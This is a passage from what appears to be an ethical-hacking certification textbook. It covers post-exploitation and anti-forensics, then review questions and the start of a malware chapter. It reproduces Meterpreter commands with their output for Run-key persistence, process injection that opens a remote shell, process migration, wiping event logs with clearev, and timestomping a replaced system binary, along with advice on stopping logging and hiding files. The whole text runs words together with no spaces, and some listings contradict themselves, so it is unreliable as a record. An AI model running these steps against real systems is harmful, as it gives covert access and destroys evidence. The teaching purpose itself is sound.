whichisHKEY_CURRENT_USER,thelocationintheRegistrythathaseverythingrelatedtothelogged-­inuser.Usingthe MetasploitModulefor Persistenceeterpreter>runpost/windows/manage/persistence_exeREXEPATH=/root/melfbowling.exe[*]RunningmoduleagainstVAGRANT-­2008R2[*]ReadingPayloadfromfile/root/elfbowling.exe[+]PersistentScriptwrittentoC:\Windows\SERVIC~2\LOCALS~1\AppData\Local\Temp\default.exe[*]ExecutingscriptC:\Windows\SERVIC~2\LOCALS~1\AppData\Local\Temp\default.exe[+]AgentexecutedwithPID5672PostExploitation 307*]InstallingintoautorunasHKCU\Software\Microsoft\Windows\CurrentVersion\[Run\qWQPRsRzw[+]InstalledintoautorunasHKCU\Software\Microsoft\Windows\CurrentVersion\Run\qWQPRsRzw[*]CleanupMeterpreterRCFile:/root/.msf4/logs/persistence/VAGRANT-­2008R2_220210112.4749/VAGRANT-­2008R2_20210112.4749.rcThisgivesusmanywaystoretainaccesstothetargetsystemspasttheinitialentrypoint.Youmayhavenoted,however,thatthesepersistencemechanismsintroducefilesandRegistryentriestothetargetsystem.Theseactionsandartifactscanbedetected,assumingtherearedetectionmechanismsontheendpointorthatanyoneispayingattentiontoactivitiesontheendpoint.Thisisaconsideration.Asyouareinvestigatingyourendpoints,youmaynoticewhetherthereismalwaredetectionorothersortsofdetectionsoftwareonthetarget.CoveringTracksAnytimeyougainaccesstoasystemaspartofapenetrationtestorsecurityassessment,youwillbeleavingfootprints.Theactofloggingintoasystemleavesalogentrybehind.Anyfilesorotherartifactsthatmayneedtobeleftonthesystemhavethepotentialofbeinglocatedandflaggedasmalicious.Thismeansthepossibilityofhavingyouractionsinvestigatedandyourfootholdremoved.You’dhavetostartalloveragainstatargetthatisputtingupadditionalhurdlesforyoutoclear.Thismeansyouneedtogetgoodatcoveringupyourexistenceasbestyoucan.Therearealotofaspectsofhidingandcoveringtracks,however.Forastart,onceyouhaveaccesstothesystem,youaremorethanlikelycreatinglogs.Logsmayneedtobeadjusted.Youmayneedtocreatefiles.Forexample,youwanttoplaceapayloadonthetargetsystem.Thiswillgenerallymeanafilesittingonthefilesystem.Youneedagoodwayofhidinganyfileyouplaceonthesystem.Onceyouhaveanexecutable,youwillwanttorunit.Thatmeanstheprocesstablewillhaveevidenceoftheprocessexecuting.Anyonelookingattheprocesstablewillseeit,causingsomeinvestigation,evenifit’sjusttheuserpokingaroundalittle.Sometimescoveringtrackscancauseabitofobscurity.Youmakesomethingalittlehardertofindorunderstand.It’salittleliketryingtohideinanopenfield.Youneedtodoyourbestatcoveringyourselfup,butsomeonedoingsomelookingwillfindyou.RootkitsTheprocesstableis,quitefrankly,thehardestartifacttoaddress.Thereasonisthattheprocesstableisstoredinkernelspace.Todoanythingwiththeprocesstable,youneedtohavetheabilitytoobscuresomethingthat’sinkernelspace.Withmostmodernoperatingsystems,thereisaringmodelwhenitcomestosecurityandprivileges.Thehighestlevelofpermissionsyoucangetisring0,whichmeansyouareinkernelspace.Thekernelneedscompletecontrolofthesystembecauseitinteractswithhardware.Nootheraspectorelementoftheoperatingenvironmentinteractswiththehardwareorthenumberofcomponentsthatthekernelneedsto.308 Chapter7  SystemHacking■Interactingwiththekernelgoesthroughapplicationprogramminginterfaces(APIs).TherequestismadetothekernelthroughtheAPI,whichfulfillstherequestandreturnstheresulttotheprocessthatissuedtherequest.Whatallthismeansisthatinordertomanipulateanythinginthekernelspace,liketheprocesstable,eitheryouneedtomakearequesttothekernelthroughanexistingAPIfunctionoryouneedtobeinthekernelspace.Astheonlywaytomanipulatetheprocesstablefromoutsidethekernelistocreateandkillprocesses,youcan’tactuallyhidetheexistenceoftheprocessfromanywherebutthekernel.Often,attackerswillmanipulatewhatuserscanseebyuseofacollectionofsoftwarecalledarootkit.Arootkitmaycontainakernelmodemoduleordriverthatwillfilterprocesstableresults.Thisrootkitwouldneedtoknowwhatthenamesorpropertiesoftheprocessesthatcomewiththerootkitaresotheycanbefilteredout.Arootkitmayalsocontainreplacementbinariesthatwillsimilarlyfilterfilelistingresultssoanyoneusingthesystembinarieswon’tknowthattherearefilesinthefilesystemrelatedtotheinfection/compromise.Unfortunately,rootkitsarenotsomethingthatcomewithMetasploitorotherattacktools.Instead,Metasploitusestacticslikeprocessencodingtogetawayfrommalwarescanners,makingitharderforthesescannerstoidentifythesoftwareyouareinjecting.Beyondthat,ifyouhavecontroloverthenameoftheexecutableyouarerunning,changingittosomethingthatwon’tbesuspectedcanhelpkeeptheprocessprotected.Ifyouwere,forexample,tonameitlsass.exe,anyonelookingwouldseethatandnotthinkmuchofitbecausethat’sacommonprocessthatisseenonaWindowssystem.ProcessInjectionSincewedon’twanttoleaveanyprocessesaroundthatcanbetracedtous,wecanthinkaboutmakinguseofanotherprocessspace.Onewayofdoingthatistoinjectcodeintoanexistingprocess.Theideaofprocessinjectionistotakecodetheattackerwantstorunandtheninjectitintoanexistingprocess.Oncethecodeisinjectedintotheprocess,theattackerneedstogetittorun,whichcanbedonebystartinganewthreadthatusestheinjectedcode.ThisisdoneonaWindowssystembygettingthehandleoftheprocessandthenusingthehandletoallocatememoryinthetargetprocess.Ahandle,fromaWindowsAPIperspective,isessentiallyapointertotheprocessentryintheprocesstable.Oncetheattackerhasthehandleandgetscodeinjectedintotheprocessspace,thatcodecangetexecuted.Thismeansthecodeisbeingrunwithintheprocessspaceofthetargetprocess.Thecodeiseffectivelyhiddeninsidethisnewprocess.Forexample,inthefollowinglisting,youcanseeaMetasploitmodulethatinjectscodeintoaprocessthatwasspecifiedasaparametertothemodule.Theprocessselectedisthepostgresprocess,meaningtheshellcodeisrunningintheprocessspaceofthedatabaseserver.ThepayloadbeingexecutedwillbindtoaTCPportwhosevaluedefaultstoport4444,sincenoothervaluewasspecifiedasaparameter.PostExploitation 309ProcessInjectionModuleeterpreter>runpost/windows/manage/multi_meterpreter_injectPID=3940mPAYLOAD=windows/shell_bind_tcp[*]RunningmoduleagainstVAGRANT-­2008R2[*]Creatingareversemeterpreterstager:LHOST=192.168.86.57LPORT=4444[+]StartingNotepad.exetohouseMeterpreterSession.[+]Processcreatedwithpid1296[*]InjectingmeterpreterintoprocessID1296[*]Allocatedmemoryataddress0x00170000,for328bytestager[*]Writingthestagerintomemory...[+]SuccessfullyinjectedMeterpreterintoprocess:1296msf>connect192.168.86.254444[*]Connectedto192.168.86.25:4444MicrosoftWindows[Version6.1.7601]Copyright(c)2009MicrosoftCorporation.Allrightsreserved.C:\ManageEngine\DesktopCentral_Server\bin>Aftertheprocessinjectioncompletes,youcanseeMetasploitbeingused,inaseparatesession,toconnecttotheremotesystem,wherewegetacommandpromptshell.Anothertechniquewecanuse,thatissimilar,istomigrateourinitialconnectiontoanotherprocess.Youcanseethistechniqueinthefollowinglisting.ThemigratemodulewillstartupanewprocessthatwillincludetheMeterpreterpayloadthatweareconnectedto.YouwillseethatwestartinaJavaServerPages(JSP)process.Oncethemigrationiscomplete,wearerunninginsidethecontextofanotepad.exeprocess.ThisisdonebyinjectingcodeintotheNotepadprocess.ProcessMigrationwith Meterpretermeterpreter>runpost/windows/manage/migrate[*]RunningmoduleagainstVAGRANT-­2008R2[*]Currentserverprocess:NepqI.jsp(5624)[*]Spawningnotepad.exeprocesstomigrateto[+]Migratingto6012[+]Successfullymigratedtoprocess6012meterpreter>310 Chapter7  SystemHacking■Whatweachievethroughtheuseofprocessmigrationistoideallyevadedetectionbyendpointprotectionsolutions.Anyactiontakingplacewillbedonefromtheprocessspaceofanexistingandunsuspiciousprocess,evenifthebehaviorsmaybesuspicious.Aswithothertechniquesdiscussedinthischapter,theimportantideaistokeepfromgettingdetected.Runningmaliciouscodeinaprocessthatwon’tearnmuchinthewayofnoticeisagoodwayofmaintainingaccesswithoutgettingdetected.Windowsisnottheonlyoperatingsystemprocessinjectioncantakeplaceon.OnLinuxandmacOSsystems,forexample,youcanoverwritetheexpectedlocationfordynamiclibrariesusingenvironmentvariableslikeLD_PRELOADonLinuxorDYLD_INSERT_LIBRARIESonmacOS.Thisplacesthelocationoftheattacker’slibrariesaheadofthesystempath,ensuringtheygetloaded.LogManipulationLoggedinformationcanbeaveryhit-­or-­missproposition.Insomecases,youwillrunacrosstargetsthatlognexttonothing.Whattheydologisn’tmaintainedanywhereotherthanthesystem.Thismeansifanyonethinkstolook,theonlyplacetheywillbeabletofindanyinformationisonthelocalsystem.Someorganizationswillplanforincidentsandmakesurethattheynotonlyhavesolidloggingpoliciesinplacebutthattheyarealsostoringsystemlogsinacentrallocation,meaningthatanythingyoudotothelogsonthelocalsystemwon’thaveanimpactbecausetheplaceanyinvestigatorisgoingtogoistothecentrallogrepositoryand,quitelikely,alogsearchtoollikeElasticStackorSplunk.Oneeasywayofhandlinganylogsonthetargetistojustclearthem.ThismeansthatyouwilleitherwipealltheentriesinthecaseoftheeventlogsonaWindowssystemorjustdeletelogfilesinthecaseofaLinuxorUnix-­likesystem.WecanreturntoMeterpreterforsomeofthiswork.OncewehavecompromisedaWindowssystemandhaveaMeterpretershell,wecanusetheclearevcommand.Youcanseethisinthefollowingcode.Oneofthechallengesofthisapproach,though,isthatyouneedtohavetherightsetofpermissions.ClearingEventViewerwith Meterpretermeterpreter>clearev[*]Wiping635recordsfromApplication...[-­]stdapi_sys_eventlog_clear:Operationfailed:Accessisdenied.meterpreter>getuidServerusername:NTAUTHORITY\LOCALSERVICEYoucanseefromtheoutputthatthecompromiseuseddidn’thaveadequatepermissionstobeabletoclearthesystemeventlog.BasedontheuserID,wehavetheLOCALSERVICEuserratherthantheLOCALSYSTEMuser.TheLOCALSYSTEMuserwouldhavehadthepermissionsnecessarytoadjustthelogs.Thisuserhaslimitedpermissions.TheprocesswouldbedifferentonUnix-­likesystems.Logstherearecommonlywritteninplaintextfiles.Withtherightpermissions,thesefilescouldbealteredbyjusterasingthemorPostExploitation 311evengettinginandremovinganylinesoutofthelogsthatmayseemincriminating.Unlessthereisauditingenabledonthesystem,editingthelogswouldbeundetectable,whichmeansyoucouldeasilyalterthemwithoutanydownside.Youcouldalsojuststopthesyslogprocesswhenyougetonthesystem.Anythingthathappensbeforethatrelatedtogainingaccesswillbelogged,butyouwouldbeabletodoanythingelseonthesystemwithoutitbeinglogged.Similarly,ifauditingisenabledonthesystem,youcoulddisabletheauditdaemon.HidingDataHidingdataisacommonactivity.Somefilescanbehiddeninplainsight.Forexample,onaWindowssystem,therearefilesthatarestoredintemporarydirectories.ThisisespeciallytrueforanythingdownloadedfromtheInternet.Figure 7.4showsadirectorylistingforthetemporaryInternetfilesonaWindowssystem.Thisisnotadirectorymostpeoplevisit,soitwouldn’tbehardtoplaceafilehereandjusthaveitnevergetnoticed.FIGURE 7.4 TemporaryInternetfilesinWindowsThepathtothatdirectoryisC:\Users\username\AppData\Local\Microsoft\Windows\TemporaryInternetFiles,whichhasalotofwaypointswhereyoucansimilarlyhidefileswheretheywon’tbeseen.Thisisinpartbecause,bydefault,manyofthedirectoriesshownherearehiddeninWindowsExplorerunlessyouchangethesettingtoshowthem.Essentially,filesanywhereintheAppDatadirectorywouldbelostintheshuffleofalotoftemporaryfilesandapplication-­specificfiles.312 Chapter7  SystemHacking■OnaLinuxsystem,youcanusedotfilesanddotdirectoriestodothesamesortofthing.Adotfilehasafilenamethatstartswithadot,suchas.bashrc.Regularfilelistingswon’tshowfilesthatstartwithadot.Similarly,youwon’tseedirectoriesthatstartwithadot.Ifyouputfilesintooneofthosedirectories,theymaygetlostoroverlooked.Windowssystemshaveafeaturecalledalternatedatastreams(ADSs),whichwereimplementedintheNewTechnologyFilesystem(NTFS)tosupportthecasewhenApple-­baseddiskswereattachedtoWindowsNT.Intheearly’90s,WindowsNTsupportedmanymoreplatformsandarchitecturesthanitdoesnow,sowhilethesupportoftheHierarchicalFileSystem(HFS)ofmacOSnolongerexistsinWindows,ADSremainsasafeature.Youwillmostcommonlyseeitusedindownloadedfiles.Theygetflaggedwiththezonetheycamefrom.Thisiswherethepop-­upaboutfilesbeingdownloadedfromtheInternetandaskingifyouwanttoopenthemcomesfrom.ThezoneintheADSischecked,andifit’sintheInternetzone,theusergetsasked.Figure 7.5showscreatinganalternatedatastreamandthencreatingadirectorylistingshowingtheexistenceofthealternatedatastream.NotallprogramsinWindowsunderstandtheADS,whichmeansyouwouldn’tnormallyusethesetostorefilesforregularuse.Theycanbeusedtostorepropertiesofthefileortheycanbeusedformaliciouspurposes.Forexample,youmaybeabletostoreexecutablesasanalternatedatastream.YoucanalsousethetypecommandtoredirectanexecutableintoanADS.Itbecomesjustanotherdatastreamattachedtothefilename’sentryinthefiletable.FIGURE 7.5 UsingalternatedatastreamsinWindowsSummary 313OneofthechallengeswithstoringexecutablesintoanADSisthattheyarenolongerdirectlyexecutablefromtheADS.Youwouldhavetoextracttheexecutableandthenrunthatratherthantryingtocallitfromtheseparatedatastream.Thishelpsprotectsystemsfromattackerswhowoulddojustthat,sinceregulardirectorylistings,includinginWindowsExplorer,wouldshownohintthattheADSisinplace.Thefilesizeonlyshowstheprimarydatastreamandnothingatallabouttheotherdatastreams.Thismakesiteffectiveathidingdata,justnotthemostefficientathidingdatathatyouwanttodirectlyexecute.OnefinalpossibilityonWindowssystemsisthevolumeshadowcopyservice.ThisisawayforWindowstostorebackupsofvolumesonarunningsystem.Windowscreatestheseshadowcopiestomaintainversionsoffiles,incasetheyneedtoberolledback.Itispossible,thoughdifficult,tomountoneofthevolumeshadowcopiesandthenmanipulatefilesinit.Thisisapossibilityforhidingdata,thoughit’snotreallythebestwaybecauseitcanbeverycumbersometodealwith.TimeManagementFilesinafilesystemallhavedatesandtimesassociatedwiththem.Youwillcommonlyhavemodified,accessed,andcreateddatesforeachfile.IfyouweretotrytoreplaceacommonfileinthefilesystemwithaTrojanthatcontainedapayloadyouhadcreated,itwouldhavethetimestampsassociatedwiththefileyouwereuploading.Thatmakesitmoredetectable.Instead,youcanmodifythetimesoffiles.Again,weturntoMeterpreter.Inthefollowingcode,youcanseetheuseoftimestomptomanipulatethetimesofafile.Usingtimestomp,wecansetthetimesonafileweuploaded,whichareidenticaltothetimestampsonthelegitimatefile.Whenwemoveourreplacementfileintoplace,itwillhavethecorrecttimes.TimestompingFilesmeterpreter>uploadregedit.exe[*]uploading:regedit.exe-­>regedit.exe[*]Uploaded72.07KiBof72.07KiB(100.0%):regedit.exe-­>regedit.exe[*]uploaded:regedit.exe-­>regedit.exemeterpreter>timestompregedit.exe-­f/windows/regedit.exe[*]PullingMACEattributesfrom/windows/regedit.exeAnytimeyoumanipulateafile,you’llbeadjustingthetimevaluesonthefilejustbytouchingit.You’llchangethemodifiedandaccessedtime,forinstance.Asawayofcoveringyourtracks,youcanmakesuretoadjustthetimevaluesonfilesyoutouchedbacktowhattheywerebeforeyouchangedthefile.SummaryOnceyouhaveallyourinformationgatheredaboutyourtarget—­networks,systems,emailaddresses,etc.—­thenextstepistoworkonexploitingthevulnerabilities.Therearemultiplereasonsforexploitingtheidentifiedvulnerabilitiesthathavenothingtodowithsimply314 Chapter7  SystemHacking■provingyoucan.Theultimategoalistoimprovethesecuritypostureandpreparednessfortheorganizationyouareworkingwith.Thismeansthereasonyouareexploitingvulnerabilitiesistodemonstratethattheyarethereandnotjustfalsepositives.Additionally,youareexploitingvulnerabilitiesinordertogatheradditionalinformationtoexploitmorevulnerabilitiestodemonstratethattheyarethere.Ultimately,onceyouhavefinishedyourtestingandidentifiedvulnerabilities,youcanreportthembacktoyouremployerorclient.Toexploitvulnerabilities,youneedawaytosearchforexploitsratherthanbeingexpectedtowritealltheexploitsyourself.Thereareonlinerepositoriesofexploits,suchaswww.exploit-­db.com.Someoftheseonlinerepositoriesaresaferthanothers.Youcould,forexample,gototheTornetworkandalsolookforexploitsthere.However,thereareseveralpotentialproblemswiththis.Whatyougettheremaynotbesafe,especiallyifyouaregrabbingbinariesorsourcecodeyoudon’tunderstand.Ifyouprefertokeepexploitrepositorieslocal,suchasifyouaren’talwayssureifyouwillhaveInternetaccess,youcangrabtheExploit-­DBrepository.Thereisalsoasearchscript,calledsearchsploit,thatwillhelpyouidentifyexploitsthatmatchpossiblevulnerabilities.Onceyouhaveexploitedasystem,thereareseveralstepsyouwouldconsidertakingthatwouldnotonlyemulatewhatanattackerwoulddobutalsogiveyoucontinuedaccesstothecompromisedsystemandalsotoothersystemsinthenetwork.Forexample,youcangrabpasswordsfromthesystemyouhavecompromised.ThesepasswordsmaybeusedonothersystemsonceyouhavecrackedthepasswordsusingatoollikeJohntheRipperorrainbowtables.InaWindowsdomain,youwillcertainlyfindthatusernamesareprobablyusableacrossmultiplesystems,andoften,localadministratorpasswordsareusedacrosssystemsaswell.Youmayfindtherearenetworksthatyoucan’tgettofromtheoutside.Youcanpivottothoseothernetworksonceyouhavecompromisedasystem.Whatyouaredoingisusingthecompromisedsystemasarouter.Youwilladjustyourroutingtabletopushtrafficthroughtheconnectionyouhavetotheremotesystem.Thatsystemwillthenforwardthepacketsouttoothersystemsonthenetwork.Toaccomplishmanytasks,youwillneedtohaveadministrativeprivileges.Thismayrequireprivilegeescalation.ThiscouldbedonebyMeterpreterautomatically,butmorethanlikelyyouwillneedtomakeuseofalocalvulnerabilitythatwillgiveyouadministrativeprivilegesoncethevulnerabilityhasbeenexploited.Metasploitcanhelpwiththat,butyoumayalsoneedtofindotherexploitsthatyourunlocally.Onethingyoumayneedelevatedprivilegesforistomaintainpersistence,meaningyoucanalwaysgetbackintothesystemwhenyouwantto.Therearewaystodoitwithoutelevatedprivileges,butgettingadministrativerightsisalwayshelpful.You’llalsowanttocoveryourtrackstoavoiddetection.Thismayincludewipingormanipulatinglogs.Thisisanotherplacewhereelevatedprivilegesareuseful.Thereareanumberofwaystohidefilesonthecompromisedsystem.Thiswillhelpwithcasualobservation,forsure.Reallyhidingfilesandprocessesmayrequirearootkit.Youcanalsomanipulatetimestampsonfiles,whichmaybenecessaryifyouarealteringanysystem-­providedfiles.ReviewQuestions ReviewQuestionsYoucanfindtheanswersintheappendix.1.Whatarethethreetimesthataretypicallystoredaspartoffilemetadata?A.Moves,adds,changesB.Modified,accessed,deletedC.Moved,accessed,changedD.Modified,accessed,created2.Whatisitcalledwhenyouobtainadministrativeprivilegesfromanormaluseraccount?A.PrivilegeescalationB.AccountmigrationC.PrivilegemigrationD.Accountescalation3.WhatdoesJohntheRipper’ssinglecrackmode,thedefaultmode,do?A.CheckseverypossiblepasswordB.UsesknowninformationandmanglingrulesC.Usesabuilt-­inwordlistD.Useswordlistandmanglingrules4.Whatisthetrade-­offforusingrainbowtables?A.DiskspaceprioritizedoverspeedB.AccuracyprioritizedoverdiskspaceC.SpeedprioritizedoveraccuracyD.Speedprioritizedoverdiskspace5.Whichoftheseisareasontouseanexploitagainstalocalvulnerability?A.PivotingB.LogmanipulationC.PrivilegeescalationD.Passwordcollection6.Whatisitcalledwhenyoumanipulatethetimestampsonfiles?A.TimestampingB.TimestompingC.MetastompingD.Metamanipulation315316 Chapter7  SystemHacking■7.WhatwouldanattackeruseanalternatedatastreamonaWindowssystemfor?A.HidingfilesB.RunningprogramsC.StoringPowerShellscriptsD.Blockingfiles8.Whichofthesetechniquesmightbeusedtomaintainaccesstoasystem?A.RunkeyintheWindowsRegistryB.AlternatedatastreamC..vimrcfileonLinuxD.PowerShell9.Ifyouwerelookingforreliableexploitsyoucoulduseagainstknownvulnerabilities,whatwouldyouuse?A.TornetworkB.MeterpreterC.msfvenomD.Exploit-­DB10.WhatmightanattackerbetryingtodobyusingtheclearevcommandinMeterpreter?A.RunanexploitB.ManipulatetimestampsC.ManipulatelogfilesD.Remotelogin11.Youfindafteryougetaccesstoasystemthatyouaretheuserwww-­data.Whatmightyoutrytodoshortlyaftergettingaccesstothesystem?A.PivottoanothernetworkB.ElevateprivilegesC.WipelogsD.Exploitthewebbrowser12.You’veinstalledmultiplefilesandprocessesonthecompromisedsystem.Whatshouldyoualsolookatinstalling?A.RegistrykeysB.AlternatedatastreamsC.RootkitD.RootloginReviewQuestions 13.Whatdoespivotingonacompromisedsystemgetyou?A.DatabaseaccessB.AroutetoextranetworksC.HigherlevelofprivilegesD.Persistentaccess14.Whatwouldyouusetheprogramrtgenfor?A.GeneratingwordlistsB.GeneratingrainbowtablesC.GeneratingfirewallrulesD.Persistentaccess15.Whichofthesewouldbeawaytoexploitaclient-­sidevulnerability?A.SendingmalformedpacketstoawebserverB.SendinglargeICMPpacketsC.SendingacraftedURLD.Brute-­forcepasswordattack16.Whatisoneoutcomefromprocessinjection?A.HiddenprocessB.RootkitC.AlternatedatastreamsD.Steganography17.Whattoolwouldyouusetocompromiseasystemandthenperformpost-­exploitationactions?A.NmapB.JohntheRipperC.searchsploitD.Metasploit18.Whatapplicationwouldbeacommontargetforclient-­sideexploits?A.WebserverB.WebbrowserC.WebapplicationfirewallD.Webpages19.Whataretwoadvantagesofusingarootkit?A.InstallingalternatedatastreamsandRegistrykeysB.CreatingRegistrykeysandhiddenprocesses317318 Chapter7  SystemHacking■C.HidingprocessesandfilesD.HidingfilesandRegistrykeys20.Whatcouldyouusetoobtainpasswordhashesfromacompromisedsystem?A.JohntheRipperB.MimikatzC.RainbowtablesD.Processdumping21.WhattechniquewouldyouusetopreventunderstandingofPowerShellscriptsthathadbeenlogged?A.EncodingB.ObfuscationC.RainbowtablesD.Kerberoasting22.WhattechniquemightyouusetogathercredentialsfromaremotesystemonaWindowsnetwork?A.KerberoastingB.FuzzingC.RootkitsD.PowerShellscripting23.Whatlanguageiscommonlyusedbyattackerswholiveofftheland?A.RubyB.PythonC.CmdletsD.PowerShell24.Ifyouwantedtoidentifyvulnerabilitiespreviouslyundiscoveredinanapplication,includinganetworkservice,whattoolmightyouuse?A.RubeusB.OphcrackC.JohntheRipperD.Peach25.Whatoperatingsystemagnosticinterfacemightyouuseifyouhadcompromisedasystem?A.RubeusB.MeterpreterC.EmpireD.OphcrackChapter8MalwareTHEFOLLOWINGCEHEXAMTOPICSARECOVEREDINTHISCHAPTER:✓✓Malwareoperations✓✓AntivirussystemsandprogramsMalwareisbigbusiness.Notonlyaretherehundredsofmillionsofmalwarefamiliesandvariantsintheworldandanunknownnumberofprogrammersdevelopingthatmalware,therearealsoatleastdozensofcompaniesdevelopinganti-­malwaresolutions.Thedeveloperswhoareworkingonwritingmalwarearegettingpaidtowritethesoftware,anticipatesellingoffthemalware,orexpecttomakemoneyfromthemalwareoperations.Figure 8.1showsthenumberofnewmalwaresamplesthathavebeenidentifiedbytheAV-­TestInstitute.Thisisbymonthoverthelasttwoyears.Youcanseethatinthattimeframe,therehaveoftenbeenmorethan10 millionnewmalwaresamplesinamonth.15.45mJan21Dec20Nov20Oct208.99m12.23m12.68mSep208.97m12.53m11.45m9.05mAug20Jul20Jun207.98mMay2010.95m9.02mApr20Mar2016.76m10.62mJan20Oct19Nov19Feb2016.61mDec1915.57m13.52m17.70m14.47mLastupdate:January17,2021Sep199.56mJul19Aug198.50mJun199.31m10.13m11.52mApr19May19Feb19Mar198.69mFIGURE 8.1 AV-­TestInstitutemalwarestatisticsCopyright©AV-TESTGmbH,www.av-test.orgMalwareTypes 321Whileweusetheumbrellatermmalware,whichisaportmanteauofthewordsmaliciousandsoftware,thereareseveraldifferenttypesofmalware.Categorizingmalwarecanbecomplicated.Somemalwarewillfallintomultiplecategoriesbecauseit’snotalwaysabouthowthemalwarespreadsorinfects;sometimesit’smoreusefultotalkaboutwhatitdoes.Tounderstandwhatthemalwaredoes,it’snecessaryforsomeonetodoanalysisofthemalware.Thiscanbedonedynamicallyorstatically.Ofcourse,youcanalsogenerallyrelyonsomeoneelse’sanalysis.Sincemalwarethesedaysisoftenpartofsomethingmuchlarger—­notstrictlylimitedtoexistinginisolationonsystems—­it’shelpfultounderstandtheinfrastructurethatcomesalongwithmalwareinfections.Thiscanalsohelptoidentifymalwareinfestations,becauseofthenetworktrafficthatsomeonemonitoringanetworkmaysee.Intermsofethicalhacking,youmaywanttocreateyourownmalware.Thiscanbedonewithoutcreatinganythingthatisnecessarilymalicious,butifyouwanttobeabletodropyourownmalwareaspartofyourtestingandalsotoprovideyourselfwithpersistentaccess,therearewaystodothat.Ofcourse,malwarecomeswithanti-­malwaresolutions.It’snotassimpleasjustsayingantivirusanymorebecausethereismoretoanti-­malwarethanatraditionalantivirussolution.Therearemultiplesolutionsthatcanbeusedtoprotectagainstmalware.Understandinghowtheyworkcanalsoprovideyouwithdetailsabouthowtopotentiallyavoidorevadethemalware.WhenyoulookattheMITREATT&CKFramework,malwareisn’ttobefound,mostlybecausethedifferentcategorieshavespecifictechniques,tactics,andproceduresthatmalwareuses.Insteadoffindingmalwareinonecategory,you’llfindmalwareindifferentcategories.MalwareTypesThismaygetalittleconfusing,simplybecauseasinglemalwaresamplecanpotentiallybeplacedintomultiplebuckets.However,we’regoingtogothroughdifferentwaysofthinkingaboutmalware.Someofthosewillhavetodowiththewaythemalwarespreadsfromsystemtosystem.Otherswillhavetodowithwhatbehaviorsthemalwareexhibits.Youmayalsodiscoverthatyoudon’tfindonetypeofmalwarewithoutalsofindinganother.Thismaybeespeciallytruewhenitcomestothedifferentbehavioraltypes.Sometypesofbehavioralmalwarejustgonaturallywithothers.Goingthroughthedifferenttypesofmalware,youwillstarttounderstandthecomplexityofthelandscapetoday.Thisincludestheusesofmalwareaswellastheusers.VirusSincethesoftwareusedtopreventoreradicatemalicioussoftwareisoftencalledantivirus,youcanprobablyfigureoutthatoneofthemostcommonwordsformalwareisvirus.Ofcourse,notallmalwareisavirus,butallcomputervirusesaremalware.Avirusrequiresuser322 Chapter8  Malware■interventiontoinfectasystem.Theuserhastodosomethingtoexecutethevirus.Oncethathappens,theviruswillinfectthesystem,possiblybyinjectingcodeintootherprograms,sowhenthoseprogramsrun,thevirusstillretainscontroloftheinfectedsystem.Everytimetheinfectedprogramsarerun,thesystemwillgetreinfected,eveniftheoriginalexecutableandprocessareremoved.Toremoveavirus,allinstancesofitneedtoberemoved.Viruseshavebeenaroundsinceatleasttheearly’70s,thoughthetheoryofself-­replicatingcomputerprogramshasbeenaroundsince1949.AnearlyexampleofacomputerviruswastheCreeper,whichinfectedsystemsontheARPAnet.Thisvirusdidnothingbutreplicateitself,withoutcausinganydamageotherthanthetimeittooktoisolateandremoveit.Thisisnotinconsequential,sincedealingwithvirusescanbeverytime-­consuming.NofilesweredeletedbyCreeper,andnosystemswererenderedunusable.ThefirstvirusonthepersonalcomputerwastheElkCloner.Thisalsodidnothingbutcopyitself.InthecaseofElkCloner,itcopieditselftofloppydisksinsertedintothesystem.Thosefloppydiskswouldthenbetakentoothersystems,infectingtheoperatingsystemtheresotheprogramwouldinfectanyfloppydiskinsertedintothatsystem.Regardlessofthevirusandwhatitdoes,therearesomeelementsthatarecommon.Everyviruswillhavetheabilitytoidentifyaprogramtoinfectandalsotocopyitselfintothatprogram.Thisdoesn’tmeanthattheonlywayavirusworksistoinfectasingleprogramandstopthere.Insomecases,itwillplacemultiplecopiesofitselfontothefilesystem.OneexampleofthatistheILoveYouvirus,whichreplacedmediafiles,likephotosandotherimages,withfilesnamedthesameexceptfortheadditionof.vbs,meaningitwasaVisualBasicScript(VBScript)file.Anytimesomeoneattemptedtolookatoneoftheirphotos,theyactuallyexecutedaVBScriptinstead,ensuringthatthesystemgotreinfected.Acomputervirusissaidtohavethesamephasesthatabiologicalvirushas.Viruseshavedormantphases,wheretheyareinactive,waitingforatrigger.Thetriggeringphaseiswhenthevirushasbeentriggeredbyauseractionorsomeotherdefinedevent.Thetriggercouldbeopeninganemail,launchingafile,orperhapsevenareachingacertaindateandtime.Virusesthatwaitforaspecifictimearesometimescalledlogicbombs.Thereisalsoapropagationphase,duringwhichtheviruswillbetryingtospreaditselfwhereitcanbyinfectingotherfilesorprograms.Itmayalsobeworkingtosenditselfoveremailtoothervictims.Finally,thereistheexecutionphase,whenthevirusdoeswhatitwaswrittentodo.Thiscouldbeanactionthatismalicious,benign,orjustanuisance.Avirusmaybememoryresident.Thismeansthatwhenitinfectsasystem,itremainsinmemory.Thiscommonlymeansthatitinstallsitselfaspartoftheoperatingsystem,whichmeansitloadsintomemorywhenthesystembootsandremainsthereuntilitshutsdown.Astheyarealwaysrunning,memory-­residentvirusescanscan,infect,andreinfectasneeded.Ifitisnonresident,thevirushastobeexecuted.Thevirusexecutes,scans,andinfectsasnecessary,thenexecutes.Onenonresidenttypeofvirusisamacrovirus.Thisisonethatexecutesasascriptaspartofadocument.Worddocuments,forexample,canincludemacros,whichareshortscriptsthatlaunchandareexecutedwhenthedocumentisopened.Thisviruscouldbespreadbyattachingtothemacroandthenjustsendingthedocumentaround.Manyotherdocumentformatssupportscriptexecution,includingthePortableDocumentFormat(PDF),andallcanbepronetothissortofvirus.MalwareTypes 323WormAviruspropagatesitselfwithsomeexternalassistance.Bycontrast,awormgetslaunchedinitially,andallsubsequentinfectionsarearesultofthewormmovingfromonesystemtoanotheronitsown.Thisiscalledself-­propagation.Theideaofcomputerwormshasbeenaroundfordecades.Infact,oneoftheearliest,andalsooneofthemostdevastating,happenedin1988.ThiswasaprogramwrittenbyagraduatestudentnamedRobertT.Morris.ItwasdesignedtotakeadvantageofseveralvulnerabilitiesinUnixprogramsasawaytomovefromonesystemtoanother.Thepayloadoftheprogramdidn’tdoanything.Itsonlypurposewastodemonstratetheabilitytomovefromonesystemtoanother.Inspiteofthat,thecostofdowntimeandcleanupwasverylarge.Onthelowendofestimates,thecostwas$218,775 in2021dollars.Thecostrangesuptoover$21 